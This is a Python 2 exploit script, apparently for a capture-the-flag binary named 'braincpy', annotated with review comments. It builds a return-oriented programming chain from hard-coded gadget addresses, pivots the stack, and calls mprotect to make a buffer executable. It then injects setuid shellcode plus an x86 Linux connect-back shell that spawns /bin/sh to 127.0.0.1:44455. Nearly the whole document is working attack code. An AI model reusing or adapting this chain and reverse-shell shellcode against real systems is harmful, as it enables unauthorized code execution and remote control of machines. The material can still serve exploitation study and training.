#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
from subprocess import Popen, PIPE
def p(a):
    """Return ``a`` packed as a 4-byte little-endian unsigned int (``<I``)."""
    dword = struct.Struct("<I")
    return dword.pack(a)
# --- Stage 1: hard-coded addresses and the argv payload ---------------------
# NOTE(review): every address below is absolute (0x08xxxxxx) and libc symbols
# such as fread_unlocked / __mprotect are resolved inside the target itself,
# so this presumably targets one specific statically linked, non-PIE build of
# ./braincpy; a PIE/ASLR build would invalidate all of them — confirm.
# NOTE(review): Python 2 only — '' and 'a' * n are str and are concatenated
# with struct.pack() output; on Python 3 this raises TypeError.
# 0x080df815: add esp, dword [ebp+0x0A] ; ret ; (1 found)
add_esp = 0x080df815
# gdb-peda$ find 0xffffffa0
# Searching for '0xffffffa0' in: None ranges
# Found 1 results, display max 1 items:
# braincpy : 0x8086c1c (<trecurse+92>: mov al,ds:0x89ffffff)
# Address of an in-binary dword equal to 0xffffffa0 (i.e. -0x60), located by
# the gdb search above; used as the operand of the add_esp gadget.
neg_0x60 = 0x8086c1c
# 080a94c0 <fread_unlocked>:
libc_fread = 0x80a94c0
# 0805a5a0 <__mprotect>:
mprotect = 0x805a5a0
# 080e5080 <_IO_2_1_stdin_>:
io_stdin = 0x80e5080
# Writable data region that stage 2 is read into (see payload2 below).
data_addr = 0x080e6030
# Gadgets popping 4 / 3 dwords before ret, plus leave;ret and pop ebp;ret.
pop4ret = 0x80489db
pop3ret = 0x80489dc
leaveret = 0x80481d1
# 0x080483a8: pop ebp ; ret ; (806 found)
pop_ebp_ret = 0x080483a8
# Laid out as a call fread_unlocked(data_addr, 0x11111111, 0x11111111, stdin)
# with pop4ret as the return address to discard the four arguments.
payload = p(libc_fread)
payload += p(pop4ret)
payload += p(data_addr)
payload += p(0x11111111)
payload += p(0x11111111)
payload += p(io_stdin)
# pop ebp (= data_addr-4) ; leave ; ret — presumably pivots esp into the
# buffer just filled from stdin, so execution continues with payload2.
payload += p(pop_ebp_ret)
payload += p(data_addr-4)
payload += p(leaveret)
# Pad to 0x60-8 bytes. NOTE(review): assumes len(payload) <= 0x58; a negative
# repeat count silently yields '' and the layout below would be off.
payload += 'a' * (0x60 - 8 - len(payload))
# Saved-ebp / return-address slots: add_esp reads dword [ebp+0x0a], i.e. the
# -0x60 found above, which moves esp back to the start of this payload.
payload += p(neg_0x60 - 0xa)
payload += p(add_esp)
# The payload is passed as argv[1]; stage 2 is written to the pipe on stdin.
process = Popen(['./braincpy', payload], stdin=PIPE)
# --- Stage 2: shellcode delivered over stdin ---------------------------------
# Raw x86 bytes matching the disassembly below: eax=0x17, ebx=0x3e8, int 0x80
# (a setuid(1000) call, going by the variable name).
# 6a 17 push 0x17
# 58 pop eax
# 68 e8 03 00 00 push 0x3e8
# 5b pop ebx
# cd 80 int 0x80
setuid = "\x6a\x17\x58\x68\xe8\x03\x00\x00\x5b\xcd\x80"
# x86/linux/connect: 70 bytes
# port=44455, host=127.0.0.1
# Opaque shellcode blob as given by its header comment; the host bytes
# 7f 00 00 01 and the port bytes ad a7 (0xada7 == 44455) are visible in it.
shellcode = (
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68"
"\xad\xa7\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80"
)
# Laid out as a call mprotect(0x080e4000, 0x4000, 0x7) — 0x7 is
# PROT_READ|PROT_WRITE|PROT_EXEC over the page range containing data_addr.
# NOTE(review): this is the step that defeats NX for the buffer; a target that
# enforces W^X at the kernel/policy level would reject the RWX mapping.
payload2 = ''
payload2 += p(mprotect)
payload2 += p(pop3ret)
payload2 += p(0x080e4000)
payload2 += p(0x4000)
payload2 += p(0x7)
# data_addr+24 skips the six dwords above (6 * 4 bytes) and lands on setuid.
payload2 += p(data_addr+24)
payload2 += setuid + shellcode
# NOTE(review): stdin is neither flushed nor closed and the child is never
# waited on, so the script may exit before the child has consumed the pipe.
process.stdin.write(payload2)